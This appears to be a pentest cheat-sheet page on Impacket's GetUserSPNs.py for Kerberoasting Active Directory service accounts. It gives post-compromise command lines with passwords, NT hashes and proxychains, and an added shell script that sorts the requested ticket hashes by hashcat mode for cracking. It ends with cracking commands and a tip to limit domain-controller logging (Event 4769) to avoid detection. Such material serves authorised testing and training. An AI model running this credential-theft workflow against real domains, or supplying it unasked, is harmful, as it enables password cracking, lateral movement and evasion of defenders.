
GetUserSPNs.py

When to Use

Useful in post-compromise enumeration. If you have obtained a password or NT hash for a domain account (for example from the SAM or from LSASS), you can use those credentials to query the domain for user accounts that have Service Principal Names (SPNs) registered, i.e. service accounts running under a user account rather than a machine account. Any authenticated domain user can run this query; no special privilege is needed.

Service accounts are often over-privileged or delegated to privileged resources. With -request, GetUserSPNs.py asks the KDC for a Ticket-Granting-Service (TGS) ticket for each SPN it finds. Part of that ticket is encrypted with a key derived from the service account's password (for RC4-HMAC, etype 23, the key is the account's NT hash itself), so the ticket does not reveal the hash directly but can be cracked offline to recover the account's plaintext password. This is Kerberoasting. A cracked password can then be used to authenticate as the service account elsewhere in the network. Caveat: every ticket requested is logged on the domain controller as Event ID 4769 (a service ticket was requested), so prefer -request-user to target a single account rather than roasting every SPN in the domain.



Usage Examples

Password Authentication

# List any service principals associated with the user
GetUserSPNs.py -dc-ip domain-controller-ip 'domain.tld/username:password'

# Request a TGS
GetUserSPNs.py -dc-ip domain-controller-ip 'domain.tld/username:password' -request

# Post-compromise via a proxy host
proxychains -q GetUserSPNs.py -dc-ip domain-controller-ip 'domain.tld/username:password'
proxychains -q GetUserSPNs.py -dc-ip domain-controller-ip 'domain.tld/username:password' -request


Pass the Hash

# List any service principals associated with the user
GetUserSPNs.py -dc-ip domain-controller-ip -hashes lm-hash:nt-hash 'domain.tld/username'

# Request a TGS
GetUserSPNs.py -dc-ip domain-controller-ip -hashes lm-hash:nt-hash 'domain.tld/username' -request

# Post-compromise via a proxy host
proxychains -q GetUserSPNs.py -dc-ip domain-controller-ip -hashes lm-hash:nt-hash 'domain.tld/username'
proxychains -q GetUserSPNs.py -dc-ip domain-controller-ip -hashes lm-hash:nt-hash 'domain.tld/username' -request
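The commands above with -request print the tickets in hashcat/john "krb5tgs" format, and -outputfile writes them to a file. The script below is an added example, not part of the original page or of Impacket: it triages such a file before cracking, extracting the account, realm and SPN for each ticket and mapping the encryption type to the matching hashcat mode, then splits the file per encryption type because hashcat runs one mode at a time. It assumes the file was produced with `GetUserSPNs.py ... -request -outputfile roast.txt`; the two sample lines are constructed filler in the layout Impacket emits (note the different placement of the `*` markers for RC4 versus AES tickets, and that `:` in an SPN is written as `~`), and their hex payloads are not real ticket material.

```shell
#!/bin/sh
# Added example (not from the original page or from Impacket): triage the
# output of "GetUserSPNs.py ... -request -outputfile roast.txt" before cracking.
#
# Impacket writes one ticket per line in two layouts:
#   RC4 (etype 23):      $krb5tgs$23$*<account>$<REALM>$<SPN>*$<checksum>$<ciphertext>
#   AES (etype 17/18):   $krb5tgs$18$<account>$<REALM>$*<SPN>*$<checksum>$<ciphertext>
# In both, ':' inside the SPN is replaced by '~'.

SAMPLE_ROAST_FILE="${TMPDIR:-/tmp}/roast.sample.txt"

# Constructed sample (assumption: the layouts above). The hex is filler, not a real ticket.
write_sample_roast() {
    cat > "$SAMPLE_ROAST_FILE" <<'EOF'
$krb5tgs$23$*svc_sql$DOMAIN.TLD$MSSQLSvc/sql01.domain.tld~1433*$00112233445566778899aabbccddeeff$deadbeefdeadbeef
$krb5tgs$18$svc_web$DOMAIN.TLD$*HTTP/web01.domain.tld*$00112233445566778899aabb$cafebabecafebabe
EOF
}

# Print "<etype> <hashcat mode> <account> <realm> <spn>" for every ticket in $1.
# hashcat modes: 13100 = etype 23 (RC4), 19600 = etype 17 (AES128), 19700 = etype 18 (AES256).
triage_roast_file() {
    awk -F'$' '
    /^\$krb5tgs\$/ {
        etype = $3
        if      (etype == 23) mode = 13100
        else if (etype == 17) mode = 19600
        else if (etype == 18) mode = 19700
        else                  mode = "unknown"
        user = $4; realm = $5; spn = $6          # same field positions in both layouts
        gsub(/\*/, "", user); gsub(/\*/, "", spn) # strip the layout markers
        gsub(/~/, ":", spn)                       # restore ':' in the SPN (e.g. the port)
        printf "%s %s %s %s %s\n", etype, mode, user, realm, spn
    }' "$1"
}

# Split $1 into $2/etype<N>.txt so each file can be fed to the right hashcat mode.
split_roast_by_etype() {
    mkdir -p "$2"
    awk -F'$' -v out="$2" '
    /^\$krb5tgs\$/ { f = out "/etype" $3 ".txt"; print > f; close(f) }' "$1"
}

# Usage: ROAST_FILE=roast.txt sh triage.sh
if [ -n "${ROAST_FILE:-}" ]; then
    triage_roast_file "$ROAST_FILE"
    split_roast_by_etype "$ROAST_FILE" "${ROAST_FILE}.split"
fi
```

Crack each split file with the mode shown in the triage output, e.g. `hashcat -m 13100 etype23.txt wordlist` for RC4 tickets; john accepts all of them with `--format=krb5tgs`. RC4 tickets are far cheaper to crack than AES ones, so prioritise etype 23 accounts, and an account that only issues AES tickets tells you the domain has disabled RC4 for it.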